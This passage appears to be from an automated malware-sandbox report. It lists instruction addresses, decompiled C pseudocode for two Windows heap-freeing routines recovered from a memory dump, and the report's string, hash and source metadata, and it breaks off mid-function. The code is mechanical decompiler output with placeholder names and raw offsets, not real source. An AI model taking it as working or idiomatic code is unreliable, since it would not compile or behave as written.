                                                0x0095d64b
                                                0x0095d626
                                                0x0095d62c
                                                0x0095d632
                                                0x0095d63e
                                                0x0095d643
                                                0x0095d643
                                                0x0095d650
                                                0x0095d653
                                                0x0095d654
                                                0x0095d658
                                                0x0095d668
                                                0x0095d668
                                                0x0095d611
                                                0x0090ceb5
                                                0x0090ceb8
                                                0x0090cebb
                                                0x0090cebe
                                                0x0090cec1
                                                0x0090cec4
                                                0x0090cec7
                                                0x0090ceca
                                                0x0095d672
                                                0x0095d676
                                                0x0095d67a
                                                0x0090ced0
                                                0x0090ced0
                                                0x0090ced3
                                                0x0095d684
                                                0x0095d687
                                                0x0090ced9
                                                0x0090cedb
                                                0x0090cede
                                                0x0090cee1
                                                0x0095d691
                                                0x0095d693
                                                0x0095d6ac
                                                0x0095d6b0
                                                0x0095d6c1
                                                0x0095d6b2
                                                0x0095d6b2
                                                0x0095d6b4
                                                0x0095d6b7
                                                0x0095d6b9
                                                0x0095d6b9
                                                0x0095d6bc
                                                0x0095d6bc
                                                0x0095d695
                                                0x0095d695
                                                0x0095d699
                                                0x0095d69e
                                                0x0095d6a4
                                                0x0095d6a6
                                                0x0095d6a6
                                                0x0095d6c4
                                                0x0095d6c7
                                                0x0090cee7
                                                0x0090cee7
                                                0x0090ceea
                                                0x0090ceea
                                                0x0090ceea
                                                0x0090cee1
                                                0x0090ced3
                                                0x0090ceef
                                                0x0090cef2
                                                0x0090cef5
                                                0x0090cef8
                                                0x0090cefc
                                                0x0091185f
                                                0x00911862
                                                0x00911865
                                                0x00911865
                                                0x0090cf02
                                                0x0090cf06
                                                0x00934b97
                                                0x00934b97
                                                0x00934b9b
                                                0x00934b9e
                                                0x00934ba2
                                                0x00934ba8
                                                0x00934bab
                                                0x00934bb0
                                                0x00934bb5
                                                0x0095d6d9
                                                0x0095d6df
                                                0x0095d6e4
                                                0x0095d6e4
                                                0x00000000
                                                0x0090cf0c
                                                0x0090cf0c
                                                0x0090cf11
                                                0x0090cf16
                                                0x0095d6ed
                                                0x0095d6f0
                                                0x0095d6f3
                                                0x0095d6f8
                                                0x0095d703
                                                0x0095d708
                                                0x0090cf1f
                                                0x0090cf1f
                                                0x0090cf21
                                                0x0090cf24
                                                0x0090cf27
                                                0x0091186e
                                                0x00911871
                                                0x00911879
                                                0x0091187c
                                                0x0091187f
                                                0x0095d710
                                                0x0095d714
                                                0x0095d72d
                                                0x0095d730
                                                0x0095d741
                                                0x0095d732
                                                0x0095d732
                                                0x0095d734
                                                0x0095d737
                                                0x0095d739
                                                0x0095d739
                                                0x0095d73c
                                                0x0095d73c
                                                0x0095d716
                                                0x0095d716
                                                0x0095d71a
                                                0x0095d71f
                                                0x0095d725
                                                0x0095d727
                                                0x0095d727
                                                0x0095d744
                                                0x0095d747
                                                0x0095d74b
                                                0x00911885
                                                0x00911885
                                                0x00911885
                                                0x00911888
                                                0x0091188f
                                                0x00911892
                                                0x00911895
                                                0x0090cf2d
                                                0x0090cf2d
                                                0x0090cf2f
                                                0x0090cf32
                                                0x0090cf35
                                                0x0090cf38
                                                0x0090cf3b
                                                0x0095d754
                                                0x0095d758
                                                0x0095d771
                                                0x0095d774
                                                0x0095d785
                                                0x0095d776
                                                0x0095d776
                                                0x0095d778
                                                0x0095d77b
                                                0x0095d77d
                                                0x0095d77d
                                                0x0095d780
                                                0x0095d780
                                                0x0095d75a
                                                0x0095d75a
                                                0x0095d75e
                                                0x0095d763
                                                0x0095d769
                                                0x0095d76b
                                                0x0095d76b
                                                0x0095d788
                                                0x0095d78b
                                                0x0095d78f
                                                0x0090cf41
                                                0x0090cf41
                                                0x0090cf41
                                                0x0090cf44
                                                0x0090cf47
                                                0x0090cf49
                                                0x0090bb10
                                                0x0090cf4f
                                                0x0090cf4f
                                                0x0090cf52
                                                0x0090cf54
                                                0x0090cf5d
                                                0x0090cf5f
                                                0x0090cf5f
                                                0x0090cf5f
                                                0x0090cf80
                                                0x0090cf80
                                                0x0090cf89
                                                0x0092330d
                                                0x00923310
                                                0x00923313
                                                0x00923326
                                                0x0092332b
                                                0x0090cf8f
                                                0x0090cf93
                                                0x0095d798
                                                0x0095d79d
                                                0x0095d79d
                                                0x0095d7a0
                                                0x0095d7a4
                                                0x0095d7a5
                                                0x0095d7a5
                                                0x0095d7a7
                                                0x0095d7a7
                                                0x0095d7a9
                                                0x0095d7ac
                                                0x0095d7af
                                                0x0095d7bc
                                                0x0095d7bc
                                                0x0095d7bf
                                                0x0095d7d0
                                                0x0095d7d0
                                                0x0095d7bf
                                                0x0095d7af
                                                0x0090cf93
                                                0x0090cf9d
                                                0x0095d7e6
                                                0x0095d7e7
                                                0x0095d7e7
                                                0x0090cfb6
                                                0x0090cfb9
                                                0x00000000
                                                0x0090cfb9
                                                0x0090cf1c
                                                0x0090cf1c
                                                0x00000000
                                                0x0090cf1c
                                                0x0090cdf7
                                                0x0090cdf7
                                                0x0090cdfa
                                                0x0090cdfa
                                                0x0090cdfd
                                                0x0090ce0d
                                                0x0090ce0f
                                                0x0090ce0f
                                                0x0090ce0f
                                                0x0090cdff
                                                0x0090ce01
                                                0x0090ce03
                                                0x00934339
                                                0x0093433c
                                                0x0093433d
                                                0x00000000
                                                0x0090ce09
                                                0x0090ce09
                                                0x00000000
                                                0x0090ce09
                                                0x0090ce03
                                                0x0090ce12
                                                0x0090ce14
                                                0x0090ce17
                                                0x0090ce1b
                                                0x0090ce1e
                                                0x0090ce20
                                                0x0090ce20
                                                0x0090ce20
                                                0x0090ce22
                                                0x0090ce25
                                                0x0090ce28
                                                0x0090ce2a
                                                0x0090ce2d
                                                0x0090ce2f
                                                0x0090ce32
                                                0x0090ce38
                                                0x0090ce39
                                                0x0090ce3b
                                                0x00934331
                                                0x00934331
                                                0x0090ce41
                                                0x0090ce44
                                                0x0090ce47
                                                0x00934309
                                                0x00000000
                                                0x0090ce4d
                                                0x0090ce4d
                                                0x0090ce50
                                                0x0090ce53
                                                0x0090ce55
                                                0x0090ce55
                                                0x0090ce55
                                                0x0090ce56
                                                0x0090ce59
                                                0x0090ce5c
                                                0x0090ce5f
                                                0x00934345
                                                0x00934348
                                                0x00934352
                                                0x00000000
                                                0x00934352
                                                0x0093434a
                                                0x0090ce7b
                                                0x0090ce7b
                                                0x0090ce7e
                                                0x0090ce83
                                                0x0090ce86
                                                0x0090ce8b
                                                0x0090ce8c
                                                0x0090ce8f
                                                0x0090ce91
                                                0x0090ce93
                                                0x0090ce93
                                                0x00000000
                                                0x0090ce93
                                                0x0090ce65
                                                0x0090ce68
                                                0x0090ce6b
                                                0x00911828
                                                0x0091182c
                                                0x0094904c
                                                0x00911832
                                                0x00911832
                                                0x00911835
                                                0x00911838
                                                0x0091183a
                                                0x0091183a
                                                0x0091183d
                                                0x0091183d
                                                0x00911840
                                                0x00911843
                                                0x00911846
                                                0x00911846
                                                0x00911848
                                                0x00000000
                                                0x0091184e
                                                0x0091184e
                                                0x00911851
                                                0x00911854
                                                0x00911857
                                                0x00000000
                                                0x00911857
                                                0x00911848
                                                0x0090ce71
                                                0x0090ce71
                                                0x0090ce74
                                                0x0090ce77
                                                0x0090ce77
                                                0x0090ce77
                                                0x00000000
                                                0x0090ce77
                                                0x0090ce47
                                                0x0090cdf1

                                                Strings
                                                • HEAP: Free Heap block %lx modified at %lx after it was freed, xrefs: 0095D65A
                                                • HEAP: , xrefs: 0095D646
                                                • HEAP[%wZ]: , xrefs: 0095D639
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2149474689.00000000008E0000.00000040.00000001.sdmp, Offset: 008D0000, based on PE: true
                                                • Associated: 00000007.00000002.2149468638.00000000008D0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149692494.00000000009C0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149700219.00000000009D0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149713288.00000000009D4000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149723271.00000000009D7000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149730125.00000000009E0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149841483.0000000000A40000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID:
                                                • String ID: HEAP: $HEAP: Free Heap block %lx modified at %lx after it was freed$HEAP[%wZ]:
                                                • API String ID: 0-2419525547
                                                • Opcode ID: 449c8d310955a3c13d94b0eef86dfdd02bdaf037bda87cf3f4e02983fd6a16b1
                                                • Instruction ID: 5d1cfb47ce28bfefcb5636d7bb32a0b59a918f68c62f09ec8fc8b28fb9eb206c
                                                • Opcode Fuzzy Hash: 449c8d310955a3c13d94b0eef86dfdd02bdaf037bda87cf3f4e02983fd6a16b1
                                                • Instruction Fuzzy Hash: EE02E1B0601206DFCB28CF29C490ABABBF5FF58301F14895EED868B286D734E945DB51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 009263DB, Relevance: 4.1, Strings: 3, Instructions: 340COMMONCrypto
                                                Download Yara Rule
                                                C-Code - Quality: 88%
                                                			E009263DB(void* __ecx, signed short* __edx) {
				signed int _v8;
				signed short* _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				signed int _t135;
				signed int _t141;
				void* _t149;
				intOrPtr _t151;
				intOrPtr _t160;
				signed int _t176;
				signed short _t179;
				intOrPtr _t180;
				signed short _t181;
				intOrPtr* _t183;
				signed short* _t185;
				signed short _t186;
				unsigned int _t195;
				signed int _t197;
				signed int _t198;
				signed int _t208;
				signed short _t209;
				signed short _t210;
				signed int _t214;
				signed int _t215;
				unsigned int* _t216;
				intOrPtr* _t218;
				signed int* _t223;
				signed int _t229;
				signed int _t230;
				signed short _t233;
				signed short _t235;
				signed int _t236;
				signed int _t238;
				void* _t240;
				signed int _t242;
				signed int _t243;
				void* _t247;
				signed int _t249;
				void* _t252;
				signed int* _t254;
				signed int _t260;
				signed int _t262;

				_t254 = __edx;
				_t238 =  *__edx & 0x0000ffff;
				__edx[1] = __edx[1] & 0x000000f8;
				_t252 = __ecx;
				__edx[3] = 0;
				_v12 = __edx;
				_v8 = _t238;
				if(( *(__ecx + 0x40) & 0x00000040) != 0) {
					_t101 =  &(_t254[4]); // 0x10
					E009289F0(_t101, _t238 * 8 - 0x10, 0xfeeefeee);
					__edx[1] = __edx[1] | 0x00000004;
					_t238 = _v8;
				}
				_t135 =  *(_t252 + 0xb8);
				__eflags = _t135;
				if(_t135 == 0) {
					_t218 =  *((intOrPtr*)(_t252 + 0xc4));
					goto L46;
				} else {
					while(1) {
						__eflags = _t238 -  *((intOrPtr*)(_t135 + 4));
						if(_t238 <  *((intOrPtr*)(_t135 + 4))) {
							_t215 = _t135;
							_v16 = _t215;
							break;
						}
						_t236 =  *_t135;
						__eflags = _t236;
						if(_t236 == 0) {
							_t238 =  *((intOrPtr*)(_t135 + 4)) - 1;
							__eflags = _t238;
							_v16 = _t135;
							_t215 = _t135;
							break;
						}
						_t135 = _t236;
					}
					_t223 = _t135 + 0x14;
					while(1) {
						_v36 = _t238;
						_v32 = _t238 -  *_t223;
						_t242 =  *(_t215 + 0x18);
						_t180 =  *((intOrPtr*)(_t242 + 4));
						_v24 = _t242;
						if(_t242 == _t180) {
							goto L70;
						}
						_t243 =  *(_t252 + 0x4c);
						if(_t243 == 0) {
							_t181 =  *(_t180 - 8) & 0x0000ffff;
						} else {
							_t210 =  *(_t180 - 8);
							_t243 =  *(_t252 + 0x4c);
							if((_t210 & _t243) != 0) {
								_t210 = _t210 ^  *(_t252 + 0x50);
							}
							_t181 = _t210 & 0x0000ffff;
						}
						_t183 = _v24;
						if(_v8 - (_t181 & 0x0000ffff) > 0) {
							L62:
							_v20 = _t183;
							goto L43;
						} else {
							_t185 =  *_t183 - 8;
							if(_t243 == 0) {
								_t186 =  *_t185 & 0x0000ffff;
							} else {
								_t209 =  *_t185;
								_t243 =  *(_t252 + 0x4c);
								if((_t209 & _t243) != 0) {
									_t209 = _t209 ^  *(_t252 + 0x50);
								}
								_t186 = _t209 & 0x0000ffff;
							}
							if(_v8 - (_t186 & 0x0000ffff) <= 0) {
								_t183 =  *_v24;
								goto L62;
							} else {
								if( *_t215 != 0 || _v36 !=  *((intOrPtr*)(_t215 + 4)) - 1) {
									_t260 = _v32 >> 5;
									_t216 =  *((intOrPtr*)(_t215 + 0x1c)) + _t260 * 4;
									_t247 = ( *((intOrPtr*)(_t215 + 4)) -  *_t223 >> 5) - 1;
									_t195 =  !((1 << (_v32 & 0x0000001f)) - 1) &  *_t216;
									if(1 == 0) {
										while(1) {
											__eflags = _t260 - _t247;
											if(_t260 > _t247) {
												break;
											}
											_t216 =  &(_t216[1]);
											_t195 =  *_t216;
											_t260 = _t260 + 1;
											__eflags = _t195;
											if(_t195 == 0) {
												continue;
											}
											break;
										}
										__eflags = _t195;
										if(_t195 != 0) {
											goto L30;
										}
										_v20 = _v20 & 0x00000000;
										L35:
										_t215 = _v16;
										goto L43;
									}
									L30:
									if((_t195 & 0x0000ffff) != 0) {
										_t249 = _t195 & 0x000000ff;
										if(_t249 == 0) {
											_t13 = (_t195 >> 0x00000008 & 0x000000ff) + 0x9037f8; // 0x10008
											_t197 = ( *_t13 & 0x000000ff) + 8;
										} else {
											_t50 = _t249 + 0x9037f8; // 0x10008
											_t197 =  *_t50 & 0x000000ff;
										}
									} else {
										_t229 = _t195 >> 0x00000010 & 0x000000ff;
										__eflags = _t229;
										if(_t229 != 0) {
											_t11 = _t229 + 0x9037f8; // 0x10008
											_t197 = ( *_t11 & 0x000000ff) + 0x10;
										} else {
											_t10 = (_t195 >> 0x18) + 0x9037f8; // 0x10008
											_t197 = ( *_t10 & 0x000000ff) + 0x18;
										}
									}
									_t262 = (_t260 << 5) + _t197;
									_t198 = _v16;
									_t230 = _t262 + _t262;
									if( *((intOrPtr*)(_t198 + 8)) == 0) {
										_t230 = _t262;
									}
									_v20 =  *((intOrPtr*)( *((intOrPtr*)(_t198 + 0x20)) + _t230 * 4));
									goto L35;
								} else {
									__eflags =  *(_t215 + 8);
									_t208 = _v32;
									if( *(_t215 + 8) != 0) {
										_t208 = _t208 + _t208;
										__eflags = _t208;
									}
									_t183 =  *((intOrPtr*)( *((intOrPtr*)(_t215 + 0x20)) + _t208 * 4));
									while(1) {
										__eflags = _v24 - _t183;
										if(_v24 == _t183) {
											break;
										}
										__eflags = _t243;
										if(_t243 == 0) {
											_t233 =  *(_t183 - 8) & 0x0000ffff;
										} else {
											_t235 =  *(_t183 - 8);
											_t243 =  *(_t252 + 0x4c);
											__eflags = _t235 & _t243;
											if((_t235 & _t243) != 0) {
												_t235 = _t235 ^  *(_t252 + 0x50);
												__eflags = _t235;
											}
											_t233 = _t235 & 0x0000ffff;
										}
										__eflags = _v8 - (_t233 & 0x0000ffff);
										if(_v8 - (_t233 & 0x0000ffff) <= 0) {
											goto L62;
										} else {
											_t183 =  *_t183;
											continue;
										}
									}
									L43:
									_t254 = _v12;
									L44:
									_t218 = _v20;
									if(_t218 == 0) {
										_t215 =  *_t215;
										_t223 = _t215 + 0x14;
										_t238 =  *_t223;
										_v16 = _t215;
										continue;
									}
									_t238 = _v8;
									L46:
									if(_t252 + 0xc4 == _t218) {
										L52:
										_t141 =  *(_t252 + 0xd0) ^  *(_t252 + 0x58);
										if(_t141 == 0) {
											_t239 = _t254;
											_t141 = E009261B3(_t254,  &_v28,  &_v8);
											_t289 = _t141;
											if(_t141 != 0) {
												_t149 = E00904167(_t239, _t289, 0xffffffff,  &_v28,  &_v8, 0x4000);
												_t213 = _t149;
												if(_t149 < 0) {
													_t151 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
													__eflags =  *(_t151 + 0xc);
													if( *(_t151 + 0xc) == 0) {
														_push("HEAP: ");
														E0094373B();
													} else {
														E0094373B("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc)) + 0xc)) + 0x2c);
													}
													_push(_v8);
													_push(_v28);
													_push(_t252);
													_t141 = E0094373B("RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %x)\n", _t213);
												} else {
													if( *0x7ffe0380 != 0) {
														_t160 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
														__eflags =  *(_t160 + 0x240) & 0x00000001;
														if(( *(_t160 + 0x240) & 0x00000001) != 0) {
															E0099EFE0(_t252, _v28, _v8, 7);
														}
													}
													_t240 = 3;
													E0090444F(_t252, _t240);
													 *((intOrPtr*)(_t252 + 0x120)) =  *((intOrPtr*)(_t252 + 0x120)) + 1;
													 *((intOrPtr*)(_t252 + 0x124)) =  *((intOrPtr*)(_t252 + 0x124)) + _v8;
													if( *0x7ffe0380 != 0) {
														__eflags =  *( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x240) & 0x00000001;
														if(__eflags != 0) {
															E0099F48C(__eflags, _t252, _v28, _v8,  *(_t252 + 0x78) << 3, 0, 0,  *0x7ffe0380 & 0x000000ff);
														}
													}
													if( *0x7ffe038a != 0) {
														E0099F48C(__eflags, _t252, _v28, _v8,  *(_t252 + 0x78) << 3, 0, 0,  *0x7ffe038a & 0x000000ff);
													}
													_t141 = _t254[0] & 0x00000013 | 0x00000008;
													_t254[0] = _t141;
												}
											}
										}
										if( *(_t252 + 0x4c) != 0) {
											_t254[0] = _t254[0] ^ _t254[0] ^  *_t254;
											_t141 =  *(_t252 + 0x50);
											 *_t254 =  *_t254 ^ _t141;
										}
										return _t141;
									}
									_t214 =  *(_t252 + 0x4c);
									L48:
									while(1) {
										if(_t214 == 0) {
											_t176 =  *(_t218 - 8) & 0x0000ffff;
											L51:
											if(_t238 > (_t176 & 0x0000ffff)) {
												_t218 =  *_t218;
												__eflags = _t252 + 0xc4 - _t218;
												if(_t252 + 0xc4 == _t218) {
													goto L52;
												}
												continue;
											}
											goto L52;
										}
										_t179 =  *(_t218 - 8);
										_t214 =  *(_t252 + 0x4c);
										if((_t179 & _t214) != 0) {
											_t179 = _t179 ^  *(_t252 + 0x50);
										}
										_t238 = _v8;
										_t176 = _t179 & 0x0000ffff;
										goto L51;
									}
								}
							}
						}
						L70:
						_v20 = _t242;
						goto L44;
					}
				}
			}

















































                                                0x009263e4
                                                0x009263e6
                                                0x009263e9
                                                0x009263ee
                                                0x009263f0
                                                0x009263f8
                                                0x009263fb
                                                0x009263fe
                                                0x009594f9
                                                0x009594fd
                                                0x00959502
                                                0x00959506
                                                0x00959506
                                                0x00926404
                                                0x0092640b
                                                0x0092640d
                                                0x0095950e
                                                0x00000000
                                                0x00926413
                                                0x00926413
                                                0x00926413
                                                0x00926416
                                                0x009262aa
                                                0x009262ac
                                                0x009262af
                                                0x009262af
                                                0x0092641c
                                                0x0092641e
                                                0x00926420
                                                0x00926429
                                                0x00926429
                                                0x0092642a
                                                0x0092642d
                                                0x00000000
                                                0x0092642d
                                                0x00926422
                                                0x00926422
                                                0x0092642f
                                                0x00926432
                                                0x00926432
                                                0x00926437
                                                0x0092643a
                                                0x0092643d
                                                0x00926440
                                                0x00926445
                                                0x00000000
                                                0x00000000
                                                0x0092644b
                                                0x00926450
                                                0x00933d3c
                                                0x00926456
                                                0x00926456
                                                0x00926459
                                                0x0092645e
                                                0x00926460
                                                0x00926460
                                                0x00926463
                                                0x00926463
                                                0x0092646e
                                                0x00926473
                                                0x0092663d
                                                0x0092663d
                                                0x00000000
                                                0x00926479
                                                0x0092647b
                                                0x00926480
                                                0x00933d45
                                                0x00926486
                                                0x00926486
                                                0x00926488
                                                0x0092648d
                                                0x0092648f
                                                0x0092648f
                                                0x00926492
                                                0x00926492
                                                0x0092649f
                                                0x00933d35
                                                0x00000000
                                                0x009264a5
                                                0x009264a8
                                                0x009264c5
                                                0x009264c8
                                                0x009264d6
                                                0x009264da
                                                0x009264dc
                                                0x00959521
                                                0x00959521
                                                0x00959523
                                                0x00000000
                                                0x00000000
                                                0x00959525
                                                0x00959528
                                                0x0095952a
                                                0x0095952b
                                                0x0095952d
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0095952d
                                                0x0095952f
                                                0x00959531
                                                0x00000000
                                                0x00000000
                                                0x00959540
                                                0x00926521
                                                0x00926521
                                                0x00000000
                                                0x00926521
                                                0x009264e2
                                                0x009264e7
                                                0x009264f4
                                                0x009264f6
                                                0x00926329
                                                0x00926330
                                                0x009264fc
                                                0x009264fc
                                                0x009264fc
                                                0x009264fc
                                                0x009262cb
                                                0x009262d0
                                                0x009262d0
                                                0x009262d6
                                                0x009262ea
                                                0x009262f1
                                                0x009262d8
                                                0x009262db
                                                0x009262e2
                                                0x009262e2
                                                0x009262d6
                                                0x00926506
                                                0x00926508
                                                0x0092650f
                                                0x00926512
                                                0x00959539
                                                0x00959539
                                                0x0092651e
                                                0x00000000
                                                0x00926346
                                                0x00926346
                                                0x0092634a
                                                0x0092634d
                                                0x0092634f
                                                0x0092634f
                                                0x0092634f
                                                0x00926354
                                                0x00926550
                                                0x00926550
                                                0x00926553
                                                0x00000000
                                                0x00000000
                                                0x00926526
                                                0x00926528
                                                0x00933d4d
                                                0x0092652e
                                                0x0092652e
                                                0x00926531
                                                0x00926534
                                                0x00926536
                                                0x00926538
                                                0x00926538
                                                0x00926538
                                                0x0092653b
                                                0x0092653b
                                                0x00926546
                                                0x00926548
                                                0x00000000
                                                0x0092654e
                                                0x0092654e
                                                0x00000000
                                                0x0092654e
                                                0x00926548
                                                0x00926555
                                                0x00926555
                                                0x00926558
                                                0x00926558
                                                0x0092655d
                                                0x00959549
                                                0x0095954b
                                                0x0095954e
                                                0x00959550
                                                0x00000000
                                                0x00959550
                                                0x00926563
                                                0x00926566
                                                0x0092656e
                                                0x0092659a
                                                0x009265a0
                                                0x009265a3
                                                0x009265ad
                                                0x009265b1
                                                0x009265b6
                                                0x009265b8
                                                0x009265c9
                                                0x009265ce
                                                0x009265d2
                                                0x009595fa
                                                0x009595fd
                                                0x00959601
                                                0x00959623
                                                0x00959628
                                                0x00959603
                                                0x0095961b
                                                0x00959620
                                                0x0095962e
                                                0x00959631
                                                0x00959634
                                                0x0095963b
                                                0x009265d8
                                                0x009265df
                                                0x00959573
                                                0x00959576
                                                0x0095957d
                                                0x0095958c
                                                0x0095958c
                                                0x0095957d
                                                0x009265e7
                                                0x009265ea
                                                0x009265f2
                                                0x009265f8
                                                0x00926605
                                                0x0095959f
                                                0x009595a6
                                                0x009595c6
                                                0x009595c6
                                                0x009595a6
                                                0x00926612
                                                0x009595ea
                                                0x009595ea
                                                0x0092661d
                                                0x0092661f
                                                0x0092661f
                                                0x009265d2
                                                0x009265b8
                                                0x00926627
                                                0x00926631
                                                0x00926634
                                                0x00926637
                                                0x00926637
                                                0x0092663c
                                                0x0092663c
                                                0x00926570
                                                0x00000000
                                                0x00926573
                                                0x00926575
                                                0x00933d56
                                                0x0092658f
                                                0x00926594
                                                0x00959558
                                                0x00959560
                                                0x00959562
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00959568
                                                0x00000000
                                                0x00926594
                                                0x0092657b
                                                0x0092657e
                                                0x00926583
                                                0x009262f9
                                                0x009262f9
                                                0x00926589
                                                0x0092658c
                                                0x00000000
                                                0x0092658c
                                                0x00926573
                                                0x009264a8
                                                0x0092649f
                                                0x00959519
                                                0x00959519
                                                0x00000000
                                                0x00959519
                                                0x00926432

                                                Strings
                                                • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %x), xrefs: 00959636
                                                • HEAP: , xrefs: 00959623
                                                • HEAP[%wZ]: , xrefs: 00959616
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2149474689.00000000008E0000.00000040.00000001.sdmp, Offset: 008D0000, based on PE: true
                                                • Associated: 00000007.00000002.2149468638.00000000008D0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149692494.00000000009C0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149700219.00000000009D0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149713288.00000000009D4000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149723271.00000000009D7000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149730125.00000000009E0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149841483.0000000000A40000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID:
                                                • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %x)
                                                • API String ID: 0-385592399
                                                • Opcode ID: 19523b028d3c66a4b7b6fe62d889bc9159da3c9a4efc7ca81549ae7bea182445
                                                • Instruction ID: 04bbf689a99256b74941324507cb9d3cd050239e101711fe7aa0be00688d0add
                                                • Opcode Fuzzy Hash: 19523b028d3c66a4b7b6fe62d889bc9159da3c9a4efc7ca81549ae7bea182445
                                                • Instruction Fuzzy Hash: 7ED1FF71A00226DFDB14CF69D480BBAB7F4FF48300F248199E9919BA99D734ED01DB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00911489, Relevance: 4.0, Strings: 3, Instructions: 271COMMONCrypto
                                                Download Yara Rule
                                                C-Code - Quality: 60%
                                                			E00911489(intOrPtr _a4, signed int _a8) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				unsigned int _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t126;
				signed int _t133;
				signed int _t134;
				signed int _t135;
				signed int* _t137;
				signed int _t139;
				intOrPtr _t140;
				signed int _t145;
				signed short _t149;
				signed int _t156;
				signed int _t166;
				signed int* _t167;
				intOrPtr _t169;
				signed short _t182;
				intOrPtr _t183;
				intOrPtr _t184;
				unsigned int _t185;
				signed int _t198;
				signed int _t199;
				intOrPtr _t201;
				intOrPtr _t204;
				intOrPtr* _t208;
				signed short _t220;
				signed short _t226;
				signed int _t228;
				intOrPtr* _t232;
				signed int _t235;
				signed short* _t237;
				signed int _t239;
				signed int _t246;
				intOrPtr* _t253;

				_t183 = _a4;
				_t253 = _a8;
				 *((intOrPtr*)(_t183 + 0xb8)) = _t253;
				if( *_t253 != 0) {
					_t126 =  *((intOrPtr*)(_t253 + 4)) -  *((intOrPtr*)(_t253 + 0x14)) - 1;
					__eflags =  *(_t253 + 8);
					if(__eflags != 0) {
						_t126 = _t126 + _t126;
						__eflags = _t126;
					}
					 *((intOrPtr*)( *((intOrPtr*)(_t253 + 0x20)) + _t126 * 4)) = 0;
					 *( *((intOrPtr*)(_t253 + 0x1c)) + ( *((intOrPtr*)(_t253 + 4)) -  *((intOrPtr*)(_t253 + 0x14)) - 1 >> 5) * 4) =  *( *((intOrPtr*)(_t253 + 0x1c)) + ( *((intOrPtr*)(_t253 + 4)) -  *((intOrPtr*)(_t253 + 0x14)) - 1 >> 5) * 4) &  !(1 << ( *((intOrPtr*)(_t253 + 4)) -  *((intOrPtr*)(_t253 + 0x14)) - 0x00000001 & 0x0000001f));
				}
				_t133 = _t183 + 0xc4;
				_t235 =  *(_t133 + 4);
				_a8 = _t235;
				if(_t133 == _t235) {
					L20:
					return _t133;
				} else {
					while(1) {
						_t237 = _t235 + 0xfffffff8;
						if( *(_t183 + 0x4c) != 0) {
							 *_t237 =  *_t237 ^  *(_t183 + 0x50);
							if(_t237[1] != (_t237[1] ^ _t237[0] ^  *_t237)) {
								_push(0);
								_push(_t237);
								_push(_t183);
								E0099F8EE(_t183, _t237, _t253, __eflags);
							}
						}
						_t134 =  *_t237 & 0x0000ffff;
						_t232 = _t253;
						if(_t134 <  *((intOrPtr*)(_t253 + 4))) {
							goto L35;
						} else {
							goto L5;
						}
						while(1) {
							L5:
							_t208 =  *_t232;
							if(_t208 == 0) {
								break;
							}
							_t232 = _t208;
							__eflags = _t134 -  *((intOrPtr*)(_t232 + 4));
							if(__eflags >= 0) {
								continue;
							}
							goto L35;
						}
						_v8 =  *((intOrPtr*)(_t232 + 4)) - 1;
						L7:
						if( *_t253 != 0) {
							_t184 =  *((intOrPtr*)(_t253 + 4));
							__eflags = _t134 - _t184;
							if(_t134 >= _t184) {
								_t134 = _t184 - 1;
							}
							_t135 = _t134 -  *((intOrPtr*)(_t253 + 0x14));
							__eflags =  *(_t253 + 8);
							_v12 = _t135;
							if( *(_t253 + 8) != 0) {
								_t135 = _t135 + _t135;
								__eflags = _t135;
							}
							_t239 = _t135 << 2;
							_t137 =  *((intOrPtr*)(_t253 + 0x20)) + _t239;
							 *((intOrPtr*)(_t253 + 0xc)) =  *((intOrPtr*)(_t253 + 0xc)) - 1;
							_v16 =  *_t137;
							_t198 =  *(_a8 + 0xfffffff8) & 0x0000ffff;
							__eflags = _t198 - _t184;
							if(_t198 >= _t184) {
								_t198 = _t184 - 1;
							}
							_t185 = _t184 - 1;
							_v20 = _t185;
							__eflags = _t198 - _t185;
							if(_t198 == _t185) {
								_t70 = _t253 + 0x10;
								 *_t70 =  *(_t253 + 0x10) - 1;
								__eflags =  *_t70;
							}
							_t199 = _a8;
							__eflags = _v16 - _t199;
							if(__eflags == 0) {
								_t201 =  *((intOrPtr*)(_t253 + 4));
								__eflags = ( *(_t199 + 0xfffffff8) & 0x0000ffff) - _t201;
								if(( *(_t199 + 0xfffffff8) & 0x0000ffff) >= _t201) {
									__eflags = _v20 - _t201;
									if(_v20 < _t201) {
										goto L38;
									}
									_t228 =  *_a8;
									_t183 = _a4;
									__eflags = _t228 -  *((intOrPtr*)(_t253 + 0x18));
									if(__eflags == 0) {
										 *_t137 =  *_t137 & 0x00000000;
										L45:
